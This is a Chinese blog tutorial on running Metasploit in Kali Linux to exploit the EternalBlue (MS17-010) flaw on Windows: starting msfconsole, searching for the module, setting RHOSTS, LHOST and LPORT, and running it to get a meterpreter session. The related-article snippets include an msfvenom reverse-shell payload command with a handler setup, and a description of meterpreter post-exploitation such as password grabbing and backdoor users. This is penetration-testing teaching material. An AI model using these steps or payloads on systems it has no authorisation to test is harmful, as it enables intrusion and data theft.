Kali渗透工具 - metasploit

最新推荐文章于 2024-03-07 17:26:48 发布
最新推荐文章于 2024-03-07 17:26:48 发布
阅读量694 收藏 4
点赞数
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A_Z_dd/article/details/130986671
版权

1.命令行界面中kali进入管理员模式

sudo su

2.Kali渗透工具 - metasploit

进入管理员模式后,输入启动代码: msfconsole(启动metasploit命令行)

msf使用法则:

使用模块 ->配置模块必选项 ->运行模块

实现对主流漏洞的攻击

例:metaspolit攻击windows操作系统时,永恒之蓝漏洞‘

msf命令行:

搜索漏洞命令: search 编号 (例子:搜索2017的第十号漏洞 search ms17_010)

Description 用来描述漏洞信息

Name中 exploit指的是漏洞攻击脚本

Name整体指的是模块名称,使用该模块就直接引用该模块的名称(也可直接引用名称前侧的编号)

第一步:使用模块

第二步:配置模块

(1.)查看设置(在Required中查看需要配置的必选项 也即是在该栏中为yes的)

查看设置的命令 : show options

在Current Setting中若已存在配置则无需配置

Payload options 是攻击载核,该攻击载核所携带的都是默认配置好的

LHOSTS为listen host代表你是谁,即是kali的IP地址

LPORT为listen port代表你要在kali上开启的端口,1-65535随便选,但不能被占用

(2.)进行配置(配置必选项 set 命令来配置)

配置攻击目标电脑的IP地址,配置到RHOSTS(RHOSTS为target host(s)代表你要攻击谁)

配置端口(防止攻击失败)

第三步:运行模块

直接 run 命令进行运行(下方出现WIN代表攻击成功,失败则代表可能不存在该漏洞此系统),成功后会来到meterpreter(代表拿到攻击目标系统的权限)

(1.)输入help即可告诉我们能够做什么事情

Command为命令名称,Description是解释说明

退出命令:exit

这里是阿政
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kaliMetasploit基本使用方法
赴前尘
06-26 517
kaliMetasploit基本使用方法
kali_linux渗透测试视频教程(10套教程).txt
04-06
10套独家渗透测试视频教程,熟练掌握Kali_Linux及metasploit渗透测试工具渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战教材一套,metasploit渗透测试魔鬼训练营教材一套。
进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器
weixin_43263566的博客
01-06 6243
Kali最强渗透工具- metasploit
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3041
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
Kali——metasploit工具渗透测试流程
qq_63167128的博客
03-07 960
介绍:本文是展示在Kali中通过使用metasploit工具进行渗透测试的流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 3166
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
Kali渗透Metasploit基本使用方法
m0_56988395的博客
02-18 2951
目录 启动 ​ 常用命令 1、核心命令中的connect命令 2、模块相关命令show使用方法 3、模块相关命令search搜索的使用方法 4、模块相关命令use的使用方法 Metaspoit是一个渗透测试平台,能够查找,利用和验证漏洞。 官网:Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit 启动 msfconsole 常用命令 1、核心命令中的connect命令.
kalimetasploit的使用
qq_28023797的博客
04-21 4966
kalimetasploit的使用Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 在kali中的中有用于渗透测试的利器:metasploit Auxiliary:辅助模块, encoders:供msfencode编码工具使用,具体可以使用msfencode –l exploits:攻击模
Kali Linux上使用Metasploit
酷狗直播-锦凡歆的博客
04-26 2003
Kali Linux上使用Metasploit Kali Linux是最受安全从业人员欢迎的操作系统,第一、它预装了几乎所有流行的渗透测试工具,降低了使用成本,其次它是基于Linux的操作系统,具有可靠的稳定性和安全性。 作者: 锦凡歆在‘来疯’直播唱歌最好听 准备工作 你可以在物理机上安装Kali Linux,也可以在虚拟机中安装它,安装过程非常简单。 在Kali Linux设...
Kali使用Metasploit内、外网渗透windows系统
vvoennvv的博客
11-05 799
内网穿透是我们在进行网络连接时的一种术语,也叫做NAT穿透,即在计算机是局域网内的时候,外网与内网的计算机的节点进行连接时所需要的连接通信,有时候就会出现内网穿透不支的情况。内网穿透的功能就是,当我们在端口映射时设置时,内网穿透起到了地址转换的功能,也就是把公网的地址进行翻译,转成为一种私有的地址,然后再采用路由的方式ADSL的宽带路由器,具有一个动态或者是固定的公网IP,最后ADSL直接在交换机上,这样所有的电脑都可以共享上网。-p, --payload 指定需要使用的payload(攻击荷载)。
Kali-利用metasploit中的exploit/multi/handler进行攻击
齐泽文的Blog
04-22 1万+
在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handl...
KaLi Linux中文指南
10-08
MetasploitMetasploit Framework支持Kali Linux,Metasploit一套针对远程主机进行开发和执行Exploit代码的工具Kali Linux既有32位和64位的映像。可用于x86 指令集。同时还有基于ARM架构的映像,可用于树莓派和...
kali-linux中文指南.pdf - 高清
08-25
MetasploitMetasploit Framework支持Kali Linux,Metasploit一套针对远程主机进行开发和执行Exploit代码的工具Kali Linux既有32位和64位的映像。可用于x86 指令集。同时还有基于ARM架构的映像,可用于树莓派和...
java收费钓鱼源码-Tools:网络安全工具
06-05
用于自动化渗透测试的图形工具,附带许多预先打包的漏洞利用程序。 - 跨平台(Windows、Linux、macOS、Android)远程管理和后期开发工具- 自动化大规模利用程序,它通过使用 Shodan.io API 收集目标,并根据 ...
Kn0ck:自动化工具渗透测试
01-31
Kn0ck是一种自动扫描程序,可以在渗透测试期间使用,以枚举并扫描漏洞。 KN0CK社区功能: 自动收集基本侦察 自动针对目标域启动Google黑客查询 通过NMap端口扫描自动枚举打开的端口 自动暴力破解子域,收集DNS...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8202
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
infrared-remote-candroid studiodemo
最新发布
05-05
android studio下载
kali linux渗透实战metasploit
04-11
使用Kali Linux操作系统可以使用Metasploit工具进行渗透测试。 Metasploit是一款功能强大的框架,可用于漏洞分析和漏洞利用。它具有多种模块,包括扫描、漏洞利用和后渗透攻击。使用它可以对系统进行测试,寻找系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这里是阿政

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值